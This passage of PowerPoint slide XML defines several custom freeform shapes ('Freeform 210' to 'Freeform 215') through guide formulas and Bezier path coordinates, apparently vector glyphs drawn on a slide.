                <a:gd name="T15" fmla="*/ 21 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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69" name="Freeform 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07CB0172-C9CD-4BF2-890F-4A6AC9A670AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1636714" y="2970213"/>
              <a:ext cx="85725" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 30 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 18 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 35 h 249"/>
                <a:gd name="T14" fmla="*/ 155 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 30 w 206"/>
                <a:gd name="T23" fmla="*/ 245 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 14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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="1"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="219"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="30" y="245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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70" name="Freeform 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D597303-E0F2-4AFD-AD63-6AEFF6AF54D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1190626" y="3221038"/>
              <a:ext cx="100013" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 237"/>
                <a:gd name="T1" fmla="*/ 279 h 307"/>
                <a:gd name="T2" fmla="*/ 181 w 237"/>
                <a:gd name="T3" fmla="*/ 304 h 307"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 304 h 307"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 307"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 307"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 307"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 307"/>
                <a:gd name="T16" fmla="*/ 139 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 307"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 307"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 307"/>
                <a:gd name="T22" fmla="*/ 161 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 307"/>
                <a:gd name="T24" fmla="*/ 161 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 307"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 86 h 307"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 307"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 307 h 307"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 279 h 307"/>
                <a:gd name="T34" fmla="*/ 161 w 237"/>
                <a:gd name="T35" fmla="*/ 172 h 307"/>
                <a:gd name="T36" fmla="*/ 161 w 237"/>
                <a:gd name="T37" fmla="*/ 207 h 307"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 307"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 307"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 307"/>
                <a:gd name="T44" fmla="*/ 161 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7" h="307">
                  <a:moveTo>
                    <a:pt x="161" y="279"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="297"/>
                    <a:pt x="161" y="304"/>
                    <a:pt x="181" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="237" y="304"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224" y="274"/>
                    <a:pt x="217" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="94"/>
                    <a:pt x="124" y="86"/>
                    <a:pt x="102" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="86"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="45" y="307"/>
                    <a:pt x="98" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="307"/>
                    <a:pt x="147" y="294"/>
                    <a:pt x="161" y="279"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="161" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161" y="207"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="235"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="241"/>
                    <a:pt x="34" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="149"/>
                    <a:pt x="69" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="161" y="145"/>
                    <a:pt x="161" y="17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71" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6788EC5F-B8B9-4EBE-84A7-BA47686104D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1304926" y="3257551"/>
              <a:ext cx="85725" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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72" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0760B174-B2F4-4E16-AE92-5CDEBC8DD701}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1419226" y="3257551"/>
              <a:ext cx="82550" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 195"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 195"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 195"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 195"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 195"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 195"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 195"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 195"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 189 w 195"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 195"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 195"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 195"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 195 w 195"/>
                <a:gd name="T25"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222">
                  <a:moveTo>
                    <a:pt x="195" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="189" y="51"/>
                    <a:pt x="189" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="46" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="195" y="173"/>
                    <a:pt x="195"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73" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09A586E3-27B5-45A2-8162-944239E9F4E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1516064" y="3259138"/>
              <a:ext cx="104775" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 228 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="188"/>
                    <a:pt x="76" y="171"/>
                    <a:pt x="76" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="5"/>
                    <a:pt x="73" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="76" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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74" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{852A3F14-3F90-47C8-81AB-043F5D34CC22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1624014" y="3259138"/>
              <a:ext cx="107950" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 57 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
